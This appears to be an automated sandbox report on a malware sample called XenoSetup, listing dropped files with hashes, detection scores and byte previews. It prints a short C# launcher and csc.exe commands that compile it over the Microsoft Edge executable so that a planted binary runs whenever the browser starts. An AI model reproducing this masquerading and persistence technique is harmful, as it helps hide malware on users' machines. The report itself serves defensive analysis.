                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........G6..)e..)e..)elR*d..)elR-d..)elR,d..)e...e..)e.(d..)e..(ef.)e.U d..)e.U+d..)eRich..)e........................PE..d......f.........."....(.Z..........@..........@..........................................`..........................................................`..\....0..\............P..(.......T.......................(...P...@............p...............................text...lY.......Z.................. ..`.rdata.......p.......^..............@..@.data...............................@....pdata..\....0......................@..@.reloc..(....P......................@..B.rsrc...\....`......................@..@................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe
                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):4608
                                                                                    Entropy (8bit):3.9308275015105774
                                                                                    Encrypted:false
                                                                                    SSDEEP:48:6vOvtlNY28D9EczBdFJyrcV4MKe2iesLhXfk9uvqBH6OulNLn+YLoqXSfbNtm:59hGEoVx9pNPkYvkkXr+YUzNt
                                                                                    MD5:987977139A7494D10F11EC2EC89FBED3
                                                                                    SHA1:33EAD1226A515435113FE0F2B0075C6F85A9F8E8
                                                                                    SHA-256:4A49CF0F1F9F03385CCA90BA2E902EDACF1B353131427E63EFC0542ADD56775C
                                                                                    SHA-512:0B4DEFC6B03B43C6A48E1652590F7B1DC617B245A611B4B530ADC38A0FAE53F91B7514500C1E1E2C02EA70176E4E143C82D5650CA2A55CAA6E1068A0C230EF16
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.... .g.............................'... ...@....@.. ....................................@.................................P'..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!..(.............................................................(....*.0..!.......r...pru..p.{....(....(....&..&..*....................0..........ry..p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings....$.......#US.........#GUID....... ...#Blob...........WU........%3................................................................
                                                                                    Process:C:\portBrokerDll\DriverbrokerCrtDhcp.exe
                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):4608
                                                                                    Entropy (8bit):3.9308275015105774
                                                                                    Encrypted:false
                                                                                    SSDEEP:48:6vOvtlNY28D9EczBdFJyrcV4MKe2iesLhXfk9uvqBH6OulNLn+YLoqXSfbNtm:59hGEoVx9pNPkYvkkXr+YUzNt
                                                                                    MD5:987977139A7494D10F11EC2EC89FBED3
                                                                                    SHA1:33EAD1226A515435113FE0F2B0075C6F85A9F8E8
                                                                                    SHA-256:4A49CF0F1F9F03385CCA90BA2E902EDACF1B353131427E63EFC0542ADD56775C
                                                                                    SHA-512:0B4DEFC6B03B43C6A48E1652590F7B1DC617B245A611B4B530ADC38A0FAE53F91B7514500C1E1E2C02EA70176E4E143C82D5650CA2A55CAA6E1068A0C230EF16
                                                                                    Malicious:true
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.... .g.............................'... ...@....@.. ....................................@.................................P'..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!..(.............................................................(....*.0..!.......r...pru..p.{....(....(....&..&..*....................0..........ry..p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings....$.......#US.........#GUID....... ...#Blob...........WU........%3................................................................
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                    Process:C:\portBrokerDll\DriverbrokerCrtDhcp.exe
                                                                                    File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                                                    Category:dropped
                                                                                    Size (bytes):406
                                                                                    Entropy (8bit):5.092799467319604
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:V/DNVgtDIbSf+eBL6LzIfiFkMSf+eBLmniFkD:JNVQIbSfhWLzIiFkMSfhCiFkD
                                                                                    MD5:841ADDE31066BBE7C24B4AC14527A892
                                                                                    SHA1:2E5CE09B4688F9E96C87F0476454B80FE224CA04
                                                                                    SHA-256:3DA59DB4039BF2F56BA24756BB33BB6F543DEA515A02771DCD6F26A33D090044
                                                                                    SHA-512:9D5A6BFDBD53D7A4D5F4A2BF00607D7D93EE351F4C9354C4A309A2B65CE8B8675E475E13F9E591793254A344E808B2594B48486F2A10BA7B1BFBC06967C6860C
                                                                                    Malicious:false
                                                                                    Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe"); } catch { } }).Start();. }.}.
                                                                                    Process:C:\portBrokerDll\DriverbrokerCrtDhcp.exe
                                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):268
                                                                                    Entropy (8bit):5.1369545553040465
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:Hu+H2L//1xRf5oeTckKBzxsjGZxWE8oN723fPLIo8eyWH:Hu7L//TRRzscQnacovFH
                                                                                    MD5:34880B32D3E02E3228098185FB4460CE
                                                                                    SHA1:61A6B42A70A291206BD7F342A2615E0D0626E55B
                                                                                    SHA-256:5514ED6168850E1193B842E8494609A8E973909DFFA9C61C59DD3607DDEEDD00
                                                                                    SHA-512:2E6D1D257D9B3601FE0758A3C70E336831D2E880A9BC25E9A04E1860A486F38D438AA1591C46C26E29F28E0C3C9EE2E4BE51F64668B32DF8DC18E0BFBC1D0F18
                                                                                    Malicious:true
                                                                                    Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\w5cymjn5\w5cymjn5.0.cs"
                                                                                    Process:C:\portBrokerDll\DriverbrokerCrtDhcp.exe
                                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (341), with CRLF, CR line terminators
                                                                                    Category:modified
                                                                                    Size (bytes):762
                                                                                    Entropy (8bit):5.25802356006249
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:Z2MI/u7L//TRRzscQnacovFOKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:0MI/un/VRzstnacovFOKax5DqBVKVrdV
                                                                                    MD5:E253024E0DFF373B408319BDFC057181
                                                                                    SHA1:134EFB9B3116F22CC9BD472CB7A74C1F2BDD0601
                                                                                    SHA-256:AF186B1A849D300AC5191250E78873F6C59F3089A4D38FBC38AC56B92DEE8013
                                                                                    SHA-512:84933B43916A24EEEE9FDD97527DDF45865AFBCADB78022475B1FAA09ACADB469FDED0486EB76879FD4BD153BA7AFB1C6C9C7113E749DF574E97BCE1D6AD8D94
                                                                                    Malicious:false
                                                                                    Preview:.C:\portBrokerDll> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\w5cymjn5\w5cymjn5.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                    Process:C:\portBrokerDll\DriverbrokerCrtDhcp.exe
                                                                                    File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                                                    Category:dropped
                                                                                    Size (bytes):399
                                                                                    Entropy (8bit):5.075862295218959
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:V/DNVgtDIbSf+eBLGanUIfiFkMSf+eBLmniFkD:JNVQIbSfhSanUIiFkMSfhCiFkD
                                                                                    MD5:D7B0D9759A51EBC2961853976335D5EC
                                                                                    SHA1:F1C37A361D0C462132602F2E5D89035FEF51A7A3
                                                                                    SHA-256:DAE5F76D2E7AF0CC1B6CC127967BA6DD9BE98B8385119ADD7963BB5995FEF946
                                                                                    SHA-512:2EDEDE31EA06DBA4E444BDD6893DB9D8364DA96DAF82E0882F948327DE80C4805E23F556CE7692CBE555C29B38EE27E9F65698D3FD99F933087C69891304EC70
                                                                                    Malicious:false
                                                                                    Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe"); } catch { } }).Start();. }.}.
                                                                                    Process:C:\portBrokerDll\DriverbrokerCrtDhcp.exe
                                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):261
                                                                                    Entropy (8bit):5.061815249345358
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:Hu+H2L//1xRPN723fyJUYwBzxsjGZxWE8oN723fnRgIbn:Hu7L//TRVanYwcQnaXb
                                                                                    MD5:13E45495BC3228975684932A3F62A3A7
                                                                                    SHA1:C998FBCA46DA7703A3A5F16D850B3AFD8C3776A1
                                                                                    SHA-256:A8B66360A32AB1310BBA1080E54C63BE76E73C45E0F93A35405CAB2BF9F27808
                                                                                    SHA-512:6B72EBBA92EC92F8324C641486FD24D24A2F0C9D7A31F412801A4C78B02D64A0DE84DCB3B6D7D9EA32D6858AFC7ECB6EED2EC4776A58F25D0A631C6B3D0B5921
                                                                                    Malicious:false
                                                                                    Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\xze5z45r\xze5z45r.0.cs"
                                                                                    Process:C:\portBrokerDll\DriverbrokerCrtDhcp.exe
                                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (334), with CRLF, CR line terminators
                                                                                    Category:modified
                                                                                    Size (bytes):755
                                                                                    Entropy (8bit):5.2554229357680535
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:Z2MI/u7L//TRVanYwcQnaXaKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:0MI/un/VVanXtnaXaKax5DqBVKVrdFAw
                                                                                    MD5:68FD50F0411ABB92EB3F01B8A5155E66
                                                                                    SHA1:2660C2B2B6A238E7A43F9142E7B93A220C94FC66
                                                                                    SHA-256:6A7A75A73E613264EE2F7C0BFFF8EEC2EBC34E4DE7836ABFC8844BC6A1251AA5
                                                                                    SHA-512:9FF5BFE60E4AEECBD1489DA4F4C68261972FAE6C0C7E91B6ED204203EFB9EB3A004243DB7BE41D3923C799B6F80AA764C83249C3DAD6E833563D021C6827551D
                                                                                    Malicious:false
                                                                                    Preview:.C:\portBrokerDll> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\xze5z45r\xze5z45r.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                    Process:C:\portBrokerDll\DriverbrokerCrtDhcp.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):39936
                                                                                    Entropy (8bit):5.629584586954759
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                                                    MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                                                    SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                                                    SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                                                    SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                    • Antivirus: ReversingLabs, Detection: 17%
                                                                                    Joe Sandbox View:
                                                                                    • Filename: DCobxod.exe, Detection: malicious, Browse
                                                                                    • Filename: SearchIndexer.exe, Detection: malicious, Browse
                                                                                    • Filename: 85D5ktqjpd.exe, Detection: malicious, Browse
                                                                                    • Filename: 3XtEci4Mmo.exe, Detection: malicious, Browse
                                                                                    • Filename: aW6kSsgdvv.exe, Detection: malicious, Browse
                                                                                    • Filename: HMhdtzxEHf.exe, Detection: malicious, Browse
                                                                                    • Filename: kJrNOFEGbQ.exe, Detection: malicious, Browse
                                                                                    • Filename: lEwK4xROgV.exe, Detection: malicious, Browse
                                                                                    • Filename: zZ1Y43bxxV.exe, Detection: malicious, Browse
                                                                                    • Filename: VqGD18ELBM.exe, Detection: malicious, Browse
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                    Process:C:\portBrokerDll\DriverbrokerCrtDhcp.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):85504
                                                                                    Entropy (8bit):5.8769270258874755
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                    MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                    SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                    SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                    SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                    • Antivirus: ReversingLabs, Detection: 71%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k
                                                                                    Process:C:\portBrokerDll\DriverbrokerCrtDhcp.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):342528
                                                                                    Entropy (8bit):6.170134230759619
                                                                                    Encrypted:false
                                                                                    SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                                                    MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                                                    SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                                                    SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                                                    SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                    • Antivirus: ReversingLabs, Detection: 50%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                    Process:C:\portBrokerDll\DriverbrokerCrtDhcp.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):70144
                                                                                    Entropy (8bit):5.909536568846014
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                                                    MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                                                    SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                                                    SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                                                    SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 29%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                    Process:C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):33280
                                                                                    Entropy (8bit):5.634433516692816
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                                                    MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                                                    SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                                                    SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                                                    SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 8%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                    Process:C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):342528
                                                                                    Entropy (8bit):6.170134230759619
                                                                                    Encrypted:false
                                                                                    SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                                                    MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                                                    SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                                                    SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                                                    SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                    • Antivirus: ReversingLabs, Detection: 50%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                    Process:C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):38912
                                                                                    Entropy (8bit):5.679286635687991
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                                                    MD5:9E910782CA3E88B3F87826609A21A54E
                                                                                    SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                                                    SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                                                    SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                    • Antivirus: ReversingLabs, Detection: 8%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                    Process:C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):36352
                                                                                    Entropy (8bit):5.668291349855899
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                                                    MD5:94DA5073CCC14DCF4766DF6781485937
                                                                                    SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                                                    SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                                                    SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                    • Antivirus: ReversingLabs, Detection: 21%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                    Process:C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):34304
                                                                                    Entropy (8bit):5.618776214605176
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                                                    MD5:9B25959D6CD6097C0EF36D2496876249
                                                                                    SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                                                    SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                                                    SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 9%
